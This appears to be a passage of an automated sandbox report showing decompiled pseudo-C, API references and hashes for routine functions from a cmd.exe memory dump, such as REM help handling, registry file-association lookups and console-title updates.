
				_t24 = __ebx;
				_t42 = 0;
				__imp___wcsicmp(L"REM/?", 0x1efaa0, _t41, _t46, __ecx);
				_t50 = __eax;
				if(__eax == 0) {
					 *0x1efaa6 = 0;
					_t42 = 1;
				}
				_t29 = 0x2d;
				_t47 = E001BE9A0(_t29, _t50);
				if(_t42 != 0) {
					_t8 = 0x2f;
					 *0x1efaa0 = _t8;
					_t9 = 0x3f;
					 *0x1efaa2 = _t9;
					 *0x1efaa4 = 0;
				} else {
					E001BF030(0);
				}
				_t37 = 0x2d;
				if(E001BDCE1(_t24, _t37, _t42) != 0) {
					 *(_t47 + 0x38) =  *(_t47 + 0x38) & 0x00000000;
					 *_t47 = 0x3c;
					goto L8;
				} else {
					E001BF300(_t11, 0, 0, 0);
					if(E001BEEC8() == 0) {
						L8:
						return _t47;
					} else {
						_t32 = 0x20;
						if(E001BF030(_t32) != 0x4000) {
							E001BF300(_t15, 0, 0, 0);
							goto L8;
						} else {
							_t34 =  *0x1efa8c +  *0x1efa8c;
							_t18 = E001C00B0( *0x1efa8c +  *0x1efa8c);
							if(_t18 == 0) {
								E001D9287(_t34);
								__imp__longjmp(0x1eb8b8, 1);
								asm("int3");
								__eflags = _t47;
								if(_t47 != 0) {
									 *_t24 = 0;
								}
								return _t24;
							} else {
								 *((intOrPtr*)(_t47 + 0x3c)) = _t18;
								E001C1040(_t18,  *0x1efa8c, 0x1efaa0);
								goto L8;
							}
						}
					}
				}
			}

0x001bde4f
0x001bde5e
0x001bde60
0x001bde68
0x001bde6a
0x001cbcac
0x001cbcb2
0x001cbcb2
0x001bde72
0x001bde78
0x001bde7c
0x001cbcba
0x001cbcbb
0x001cbcc3
0x001cbcc4
0x001cbccc
0x001bde82
0x001bde84
0x001bde84
0x001bde8b
0x001bde93
0x001cbcd7
0x001cbcdb
0x00000000
0x001bde99
0x001bde9f
0x001bdeab
0x001bdee6
0x001bdeeb
0x001bdead
0x001bdeaf
0x001bdeba
0x001bdef2
0x00000000
0x001bdebc
0x001bdec1
0x001bdec4
0x001bdecb
0x001cbce6
0x001cbcf2
0x001cbcf8
0x001cbcf9
0x001cbcfb
0x001cbd03
0x001cbd03
0x001bdfb5
0x001bded1
0x001bdede
0x001bdee1
0x00000000
0x001bdee1
0x001bdecb
0x001bdeba
0x001bdeab

APIs

_wcsicmp.MSVCRT ref: 001BDE60

Part of subcall function 001BF300: _setjmp3.MSVCRT ref: 001BF318
Part of subcall function 001BF300: iswspace.MSVCRT ref: 001BF35B
Part of subcall function 001BF300: wcschr.MSVCRT ref: 001BF37D
Part of subcall function 001BF300: iswdigit.MSVCRT ref: 001BF3DE

Part of subcall function 001C00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,001BDF68,00000001,?,00000000,001C3458,-00000105,001DBDD8,00000240,001C4B82,00000000,00000000,001CAE6E,00000000), ref: 001C00C1
Part of subcall function 001C00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,001BDF68,00000001,?,00000000,001C3458,-00000105,001DBDD8,00000240,001C4B82,00000000,00000000,001CAE6E,00000000,?), ref: 001C00C8

longjmp.MSVCRT(001EB8B8,00000001,00000000), ref: 001CBCF2

Strings

REM/?, xrefs: 001BDE59

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: Heap$AllocProcess_setjmp3_wcsicmpiswdigitiswspacelongjmpwcschr
String ID: REM/?
API String ID: 1631155197-4093888634
Opcode ID: 0e3793903e3e2cf768a17ffbdabd6470068afdfd7fbc0ded3ccc456dd7d04754
Instruction ID: 709649f3c83cd57f7ee9b40a11c5e0586092e94b9832c8799b9eed5b683e99a8
Opcode Fuzzy Hash: 0e3793903e3e2cf768a17ffbdabd6470068afdfd7fbc0ded3ccc456dd7d04754
Instruction Fuzzy Hash: 9321C2223547809AE768A776AD87BBB62959FE0751F10443FF906CFAD1EFB0C8468305

Uniqueness

Uniqueness Score: -1.00%

Function 001D4A29 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88
registryCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E001D4A29(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t24;
				intOrPtr* _t33;
				intOrPtr _t34;
				signed int _t57;
				signed int _t59;
				long _t61;
				void* _t62;

				_push(0x1c);
				_push(0x1dc120);
				E001C7678(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t62 - 0x2c)) = __ecx;
				_t59 = 0;
				 *((intOrPtr*)(_t62 - 0x24)) = 0;
				_t37 = 0;
				 *((intOrPtr*)(_t62 - 0x28)) = 0;
				_t61 = RegOpenKeyExW(0x80000002, L"Software\\Classes", 0, 0x2000000, _t62 - 0x20);
				 *((intOrPtr*)(_t62 - 0x1c)) = _t61;
				if(_t61 == 0) {
					_t24 = E001BEA40( *((intOrPtr*)( *((intOrPtr*)(_t62 - 0x2c)) + 0x3c)), "=", 3);
					 *((intOrPtr*)(_t62 - 0x2c)) = _t24;
					 *((intOrPtr*)(_t62 - 4)) = 0;
					if( *_t24 != 0) {
						_t59 = E001BDF40(E001C22C0(0, _t24));
						 *((intOrPtr*)(_t62 - 0x24)) = _t59;
						__eflags = _t59;
						if(_t59 != 0) {
							_t46 =  *(E001BD7E6( *((intOrPtr*)(_t62 - 0x2c)))) & 0x0000ffff;
							__eflags = _t46;
							if(_t46 != 0) {
								__eflags = _t46 - 0x3d;
								if(_t46 == 0x3d) {
									 *((intOrPtr*)(_t62 - 0x2c)) = E001BD7E6(_t29);
									_t37 = E001BDF40(E001C22C0(0, _t30));
									 *((intOrPtr*)(_t62 - 0x28)) = _t37;
									__eflags = _t37;
									if(_t37 != 0) {
										_t33 = E001BD7E6( *((intOrPtr*)(_t62 - 0x2c)));
										_t46 = 0;
										__eflags =  *_t33;
										if(__eflags == 0) {
											_t34 = E001D587B(_t37,  *(_t62 - 0x20), _t59, _t59, _t61, __eflags, _t37);
											goto L14;
										} else {
											_push(0);
											goto L9;
										}
									}
								} else {
									_push(0);
									L9:
									_push(0x232a);
									E001BC5A2(_t46);
								}
							} else {
								_t57 = _t59;
								goto L3;
							}
						}
					} else {
						_t57 = 0;
						L3:
						_t34 = E001D4B4E( *(_t62 - 0x20), _t57);
						L14:
						_t61 = _t34;
						 *((intOrPtr*)(_t62 - 0x1c)) = _t61;
					}
					 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
					E001D4B3F(_t37, _t59);
					RegCloseKey( *(_t62 - 0x20));
					_t22 = _t61;
				}
				return E001C76BD(_t22);
			}

0x001d4a29
0x001d4a2b
0x001d4a30
0x001d4a35
0x001d4a3a
0x001d4a3c
0x001d4a3f
0x001d4a41
0x001d4a5e
0x001d4a60
0x001d4a65
0x001d4a78
0x001d4a7d
0x001d4a82
0x001d4a88
0x001d4aa4
0x001d4aa6
0x001d4aa9
0x001d4aab
0x001d4ab5
0x001d4ab8
0x001d4abb
0x001d4ac1
0x001d4ac4
0x001d4add
0x001d4aee
0x001d4af0
0x001d4af3
0x001d4af5
0x001d4afa
0x001d4aff
0x001d4b01
0x001d4b04
0x001d4b0f
0x00000000
0x001d4b06
0x001d4b06
0x00000000
0x001d4b06
0x001d4b04
0x001d4ac6
0x001d4ac6
0x001d4ac8
0x001d4ac8
0x001d4acd
0x001d4ad3
0x001d4abd
0x001d4abd
0x00000000
0x001d4abd
0x001d4abb
0x001d4a8a
0x001d4a8a
0x001d4a8c
0x001d4a8f
0x001d4b14
0x001d4b14
0x001d4b16
0x001d4b16
0x001d4b19
0x001d4b20
0x001d4b28
0x001d4b2e
0x001d4b2e
0x001d4b35

APIs

RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Classes,00000000,02000000,?,001DC120,0000001C,001D5CB1), ref: 001D4A58

Part of subcall function 001BEA40: wcschr.MSVCRT ref: 001BEAB7
Part of subcall function 001BEA40: iswspace.MSVCRT ref: 001BEB2D
Part of subcall function 001BEA40: wcschr.MSVCRT ref: 001BEB49
Part of subcall function 001BEA40: wcschr.MSVCRT ref: 001BEB6D

RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000003), ref: 001D4B28

Part of subcall function 001D587B: RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,001DC0E0,00000018,001D4B14,00000000,00000003), ref: 001D58AF
Part of subcall function 001D587B: RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,00000000,00000001,?,00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,001DC0E0), ref: 001D58E5
Part of subcall function 001D587B: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,001DC0E0,00000018,001D4B14,00000000,00000003), ref: 001D58F3

Strings

Software\Classes, xrefs: 001D4A4E

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: wcschr$Close$CreateOpenValueiswspace
String ID: Software\Classes
API String ID: 1047774138-1656466771
Opcode ID: 44d4599489de18619cf32ea2faf246b1060baf5b063c044b10cd4bf5a4bcc976
Instruction ID: f6831d002b7acc72e0702f0c387f995fd01ec0c28f27738f5ac3a6367f291b7c
Opcode Fuzzy Hash: 44d4599489de18619cf32ea2faf246b1060baf5b063c044b10cd4bf5a4bcc976
Instruction Fuzzy Hash: 3D315071F442149BDF18EBF99852BEDB6B5AFA8700B14412FE402B7391EB708D008B64

Uniqueness

Uniqueness Score: -1.00%

Function 001D51C5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86
registryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E001D51C5(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t24;
				intOrPtr* _t32;
				intOrPtr _t33;
				signed int _t55;
				signed int _t57;
				long _t59;
				void* _t60;

				_push(0x1c);
				_push(0x1dc0c0);
				E001C7678(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t60 - 0x2c)) = __ecx;
				_t57 = 0;
				 *((intOrPtr*)(_t60 - 0x24)) = 0;
				_t36 = 0;
				 *((intOrPtr*)(_t60 - 0x28)) = 0;
				_t59 = RegOpenKeyExW(0x80000002, L"Software\\Classes", 0, 0x2000000, _t60 - 0x20);
				 *((intOrPtr*)(_t60 - 0x1c)) = _t59;
				if(_t59 == 0) {
					_t24 = E001BEA40( *((intOrPtr*)( *((intOrPtr*)(_t60 - 0x2c)) + 0x3c)), "=", 3);
					 *((intOrPtr*)(_t60 - 0x2c)) = _t24;
					 *((intOrPtr*)(_t60 - 4)) = 0;
					if( *_t24 != 0) {
						_t57 = E001BDF40(E001C22C0(0, _t24));
						 *((intOrPtr*)(_t60 - 0x24)) = _t57;
						if(_t57 != 0) {
							_t45 =  *(E001BD7E6( *((intOrPtr*)(_t60 - 0x2c)))) & 0x0000ffff;
							if(_t45 != 0) {
								if(_t45 == 0x3d) {
									 *((intOrPtr*)(_t60 - 0x2c)) = E001BD7E6(_t29);
									_t36 = E001BDF40(_t30);
									 *((intOrPtr*)(_t60 - 0x28)) = _t36;
									if(_t36 != 0) {
										_t32 = E001BD7E6( *((intOrPtr*)(_t60 - 0x2c)));
										_t45 = 0;
										if( *_t32 == 0) {
											_t33 = E001D59E6( *(_t60 - 0x20), _t57, _t36);
											goto L14;
										} else {
											_push(0);
											goto L9;
										}
									}
								} else {
									_push(0);
									L9:
									_push(0x232a);
									E001BC5A2(_t45);
								}
							} else {
								_t55 = _t57;
								goto L3;
							}
						}
					} else {
						_t55 = 0;
						L3:
						_t33 = E001D4CF0( *(_t60 - 0x20), _t55);
						L14:
						_t59 = _t33;
						 *((intOrPtr*)(_t60 - 0x1c)) = _t59;
					}
					 *((intOrPtr*)(_t60 - 4)) = 0xfffffffe;
					E001D52D4(_t36, _t57);
					RegCloseKey( *(_t60 - 0x20));
					_t22 = _t59;
				}
				return E001C76BD(_t22);
			}

0x001d51c5
0x001d51c7
0x001d51cc
0x001d51d1
0x001d51d6
0x001d51d8
0x001d51db
0x001d51dd
0x001d51fa
0x001d51fc
0x001d5201
0x001d5214
0x001d5219
0x001d521e
0x001d5224
0x001d5240
0x001d5242
0x001d5247
0x001d5251
0x001d5257
0x001d5260
0x001d5279
0x001d5283
0x001d5285
0x001d528a
0x001d528f
0x001d5294
0x001d5299
0x001d52a4
0x00000000
0x001d529b
0x001d529b
0x00000000
0x001d529b
0x001d5299
0x001d5262
0x001d5262
0x001d5264
0x001d5264
0x001d5269
0x001d526f
0x001d5259
0x001d5259
0x00000000
0x001d5259
0x001d5257
0x001d5226
0x001d5226
0x001d5228
0x001d522b
0x001d52a9
0x001d52a9
0x001d52ab
0x001d52ab
0x001d52ae
0x001d52b5
0x001d52bd
0x001d52c3
0x001d52c3
0x001d52ca

APIs

RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Classes,00000000,02000000,?,001DC0C0,0000001C,001D5CE1), ref: 001D51F4

Part of subcall function 001BEA40: wcschr.MSVCRT ref: 001BEAB7
Part of subcall function 001BEA40: iswspace.MSVCRT ref: 001BEB2D
Part of subcall function 001BEA40: wcschr.MSVCRT ref: 001BEB49
Part of subcall function 001BEA40: wcschr.MSVCRT ref: 001BEB6D

RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000003), ref: 001D52BD

Strings

Software\Classes, xrefs: 001D51EA

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: wcschr$CloseOpeniswspace
String ID: Software\Classes
API String ID: 2439148603-1656466771
Opcode ID: b42221290f7259124b52456bb5a195e0d49a8627a3c6c5bf9054dda490073eaa
Instruction ID: ca6afefc540c59c3db32bbc772d81750f12da26ba8077f4e9299f3cf571c49d6
Opcode Fuzzy Hash: b42221290f7259124b52456bb5a195e0d49a8627a3c6c5bf9054dda490073eaa
Instruction Fuzzy Hash: 28216131E04615DBDF18EBB9D851AEDB6B2AF98710B20402EE402BB395EB704D058B60

Uniqueness

Uniqueness Score: -1.00%

Function 001C100C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E001C100C(long __eax, intOrPtr* __ecx) {
				intOrPtr _v8;
				signed int _v12;
				long _t13;
				intOrPtr _t14;
				signed int _t15;
				short _t21;
				signed int _t24;
				intOrPtr* _t26;
				intOrPtr* _t29;
				WCHAR* _t35;
				long _t40;
				intOrPtr _t43;
				short* _t44;
				WCHAR* _t47;
				void* _t48;
				WCHAR* _t49;

				_t13 = __eax;
				_t26 = __ecx;
				if(__ecx != 0 &&  *0x1f3cc4 == 0 &&  *0x1f3ccc == 0) {
					_t13 = E001C00B0(0x20c);
					_t47 = _t13;
					if(_t47 != 0) {
						_t13 = GetConsoleTitleW(_t47, 0x104);
						_t40 = _t13;
						if(_t40 != 0) {
							_v12 = _v12 & 0x00000000;
							_t29 = _t26;
							_t3 = _t29 + 2; // 0x2
							_t48 = _t3;
							do {
								_t14 =  *_t29;
								_t29 = _t29 + 2;
							} while (_t14 != _v12);
							_t15 =  *0x1dd570; // 0x0
							_t17 = _t15 + (_t29 - _t48 >> 1) + _t40 + 0xa;
							_v8 = _t15 + (_t29 - _t48 >> 1) + _t40 + 0xa;
							_t49 = E001C0100(_t47, _t15 + (_t29 - _t48 >> 1) + _t40 + 0xa + _t17);
							if(_t49 == 0) {
								L16:
								return E001C0040(_t47);
							}
							_t47 = _t49;
							_t43 = _v8;
							if( *0x1dd59c == 0) {
								E001C18C0(_t49, _t43, L" - ");
								_t35 = _t49;
								_t10 =  &(_t35[1]); // 0x2
								_t44 = _t10;
								do {
									_t21 =  *_t35;
									_t35 =  &(_t35[1]);
								} while (_t21 != _v12);
								 *0x1dd570 = _t35 - _t44 >> 1;
								E001C18C0(_t49, _v8, _t26);
								 *0x1dd59c = 1;
								L15:
								SetConsoleTitleW(_t49);
								goto L16;
							}
							_t24 =  *0x1dd570; // 0x0
							E001C1040( &(_t49[_t24]), _t43 - _t24, _t26);
							goto L15;
						}
					}
				}
				return _t13;
			}

0x001c100c
0x001c1015
0x001c101b
0x001ccdca
0x001ccdcf
0x001ccdd3
0x001ccddf
0x001ccde5
0x001ccde9
0x001ccdef
0x001ccdf3
0x001ccdf5
0x001ccdf5
0x001ccdf8
0x001ccdf8
0x001ccdfb
0x001ccdfe
0x001cce04
0x001cce14
0x001cce16
0x001cce21
0x001cce25
0x001cce87
0x00000000
0x001cce89
0x001cce2e
0x001cce30
0x001cce33
0x001cce4e
0x001cce53
0x001cce55
0x001cce55
0x001cce58
0x001cce58
0x001cce5b
0x001cce5e
0x001cce6b
0x001cce74
0x001cce79
0x001cce80
0x001cce81
0x00000000
0x001cce81
0x001cce35
0x001cce40
0x00000000
0x001cce40
0x001ccde9
0x001ccdd3
0x001c102c

APIs

GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000,00000104,?,00000000,00000000,?,?,001C0B7F), ref: 001CCDDF
SetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000,00000000, - ,?,00000000,00000000,?), ref: 001CCE81

Strings

- , xrefs: 001CCE47

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: ConsoleTitle
String ID: -
API String ID: 3358957663-3695764949
Opcode ID: 3ce276d4d339fdca5070d8cfe065fa7b64185fc26f4086c8bda028bf222fb2e9
Instruction ID: f879da207919e7ced41af9fb7ca163aabfb52e952084271ff6cacb0cc0960ad1
Opcode Fuzzy Hash: 3ce276d4d339fdca5070d8cfe065fa7b64185fc26f4086c8bda028bf222fb2e9
Instruction Fuzzy Hash: 4B216B31600100A7CB29AB6CE855FBE7BB5ABA5344F19411DF80657756EF30DD86C7C1

Uniqueness

Uniqueness Score: -1.00%

Function 001D8430 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E001D8430(void* __ecx, void* __edx, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a52) {
				void* _t14;
				void* _t26;
				void* _t31;

				_t26 = __edx;
				_t25 = __ecx;
				_push(__ecx);
				_push(__ecx);
				if((_a4 | _a8) == 0) {
					_t31 = 0x64;
				} else {
					_t31 = E001C8100(E001C81B0(_a12, _a16, 0x64, 0), _t26, _a4, _a8);
				}
				_t23 = L"%3d";
				E001C274C(0x1f3d00, 0x104, L"%3d", _t31);
				E001BC108(_t25, 0x40002722, 1, 0x1f3d00);
				if( *0x1dd544 == 0) {
					_t14 = 0;
				} else {
					E001C274C(0x1f3d00, 0x104, _t23, _t31);
					E001BC108(_t25, 0x40002722, 1, 0x1f3d00);
					printf("\n");
					_t14 = (0 | _a52 != 0x00000000) + 1;
				}
				return _t14;
			}

0x001d8430
0x001d8430
0x001d8435
0x001d8436
0x001d8440
0x001d8464
0x001d8442
0x001d845e
0x001d845e
0x001d8466
0x001d8477
0x001d8484
0x001d8493
0x001d84c8
0x001d8495
0x001d849d
0x001d84aa
0x001d84b4
0x001d84c5
0x001d84c5
0x001d84d0

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001D8459
printf.MSVCRT ref: 001D84B4

Strings

%3d, xrefs: 001D8466, 001D8470, 001D8496

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@printf
String ID: %3d
API String ID: 2845598586-2138283368
Opcode ID: b5152af399c24f607f51c3206defa10e2c61b1a1d86e0f66459aa2b8834ea6ae
Instruction ID: 77adf47d11c81ab14ec4a225943d667a0562b91b1fe0a5c9de3f32248c01d21f
Opcode Fuzzy Hash: b5152af399c24f607f51c3206defa10e2c61b1a1d86e0f66459aa2b8834ea6ae
Instruction Fuzzy Hash: 1A012DB1640204BFEB206B559CC7FEB3EADDBA4BA0F004019FB0865181D7B1DC60C6B1

Uniqueness

Uniqueness Score: -1.00%

Function 001C0C70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E001C0C70(void* __ecx, int _a4) {
				void* _v0;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t24;
				int _t34;
				void* _t35;
				void* _t36;
				void* _t37;

				_t35 = __ecx;
				_t34 = _a4;
				_t39 = _t34 -  *((intOrPtr*)(__ecx + 0x210));
				if(_t34 <=  *((intOrPtr*)(__ecx + 0x210))) {
					L6:
					return 0;
				}
				_push(0x1b262a);
				_t24 = E001C72B5(_t23, _t34, __ecx, _t39,  ~(0 | _t39 > 0x00000000) | _t34 * 0x00000002);
				_t37 = _t36 + 8;
				if(_t24 == 0) {
					E001D292C("onecore\\base\\cmd\\maxpathawarestring.cpp", 0x8007000e);
					return 0x8007000e;
				}
				_t20 =  *(_t35 + 0x208);
				if(_t24 != _t20) {
					__imp__??_V@YAXPAX@Z(_t20);
					_t37 = _t37 + 4;
					 *(_t35 + 0x208) = _t24;
				}
				_t21 =  *(_t35 + 0x208);
				 *(_t35 + 0x210) = _t34;
				if(_t21 == 0) {
					_t21 = _t35;
				}
				memset(_t21, 0, _t34);
				goto L6;
			}

0x001c0c77
0x001c0c7a
0x001c0c7d
0x001c0c83
0x001c0ce5
0x00000000
0x001c0ce5
0x001c0c90
0x001c0ca2
0x001c0ca4
0x001c0ca9
0x001ccd56
0x00000000
0x001ccd5b
0x001c0caf
0x001c0cb7
0x001c0cba
0x001c0cc0
0x001c0cc3
0x001c0cc3
0x001c0cc9
0x001c0ccf
0x001c0cd7
0x001c0cee
0x001c0cee
0x001c0cdd
0x00000000

APIs

Part of subcall function 001C72B5: __EH_prolog3_catch.LIBCMT ref: 001C7650

??_V@YAXPAX@Z.MSVCRT ref: 001C0CBA
memset.MSVCRT ref: 001C0CDD

Strings

onecore\base\cmd\maxpathawarestring.cpp, xrefs: 001CCD51

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: H_prolog3_catchmemset
String ID: onecore\base\cmd\maxpathawarestring.cpp
API String ID: 620422817-3416068913
Opcode ID: b278324b12e847f468fb618b4033acf156a7e5434b094441ea80e1ce33f06efe
Instruction ID: 52fb9696463f50cd9c26b762cd7492b7c05d1f2ee5c6b678927c6e9cfd7a5c24
Opcode Fuzzy Hash: b278324b12e847f468fb618b4033acf156a7e5434b094441ea80e1ce33f06efe
Instruction Fuzzy Hash: D601D871300304DBD7259679DC89FABB2D9EBA4350F14063EF46AD7240DBB6EC40C6A4

Uniqueness

Uniqueness Score: -1.00%

Function 02CDFDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E02CDFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E02C8CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E02CD5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E02CD5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x02cdfdda
0x02cdfde2
0x02cdfde5
0x02cdfdec
0x02cdfdfa
0x02cdfdff
0x02cdfe0a
0x02cdfe0f
0x02cdfe17
0x02cdfe1e
0x02cdfe19
0x02cdfe19
0x02cdfe19
0x02cdfe20
0x02cdfe21
0x02cdfe22
0x02cdfe25
0x02cdfe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02CDFDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02CDFE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02CDFE01

Memory Dump Source

Source File: 0000000E.00000002.522093440.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: true

Associated: 0000000E.00000002.523579125.0000000002D3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.523600333.0000000002D3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2c20000_cmd.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: dcd09f459b1cfd1c2f7c69dd17b06154d06d70514e51a062b8969c8494c62c5b
Instruction ID: 94f31ebfa638eab8cb21a4953c362b64535b3b39d90bd0b81b714214a1997f77
Opcode Fuzzy Hash: dcd09f459b1cfd1c2f7c69dd17b06154d06d70514e51a062b8969c8494c62c5b
Instruction Fuzzy Hash: AAF0F632200641BFEA251A55DC02F63BB5FEB44770F254315F728565D1DA62FD2096F1

Uniqueness

Uniqueness Score: -1.00%

Function 001BDEF9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E001BDEF9(signed short* __ecx) {
				long _t9;
				signed short* _t11;

				_t11 = __ecx;
				if(__ecx != 0) {
					while(1) {
						_t9 =  *_t11 & 0x0000ffff;
						if(iswspace(_t9) != 0) {
							goto L6;
						}
						L3:
						if(wcschr(L"=,;", _t9) != 0) {
							if(_t9 == 0) {
								goto L4;
							} else {
								L7:
								_t11 =  &(_t11[1]);
								continue;
							}
							L10:
						}
						L4:
						goto L5;
						L6:
						if(_t9 == 0xa) {
							goto L3;
						} else {
							goto L7;
						}
						goto L5;
					}
				}
				L5:
				return _t11;
				goto L10;
			}

0x001bdefc
0x001bdf00
0x001bdf03
0x001bdf03
0x001bdf10
0x00000000
0x00000000
0x001bdf12
0x001bdf22
0x001bdf36
0x00000000
0x001bdf38
0x001bdf2e
0x001bdf2e
0x00000000
0x001bdf2e
0x00000000
0x001bdf36
0x001bdf24
0x00000000
0x001bdf29
0x001bdf2c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x001bdf2c
0x001bdf03
0x001bdf25
0x001bdf28
0x00000000

APIs

iswspace.MSVCRT ref: 001BDF07
wcschr.MSVCRT ref: 001BDF18

Strings

=,;, xrefs: 001BDF13

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

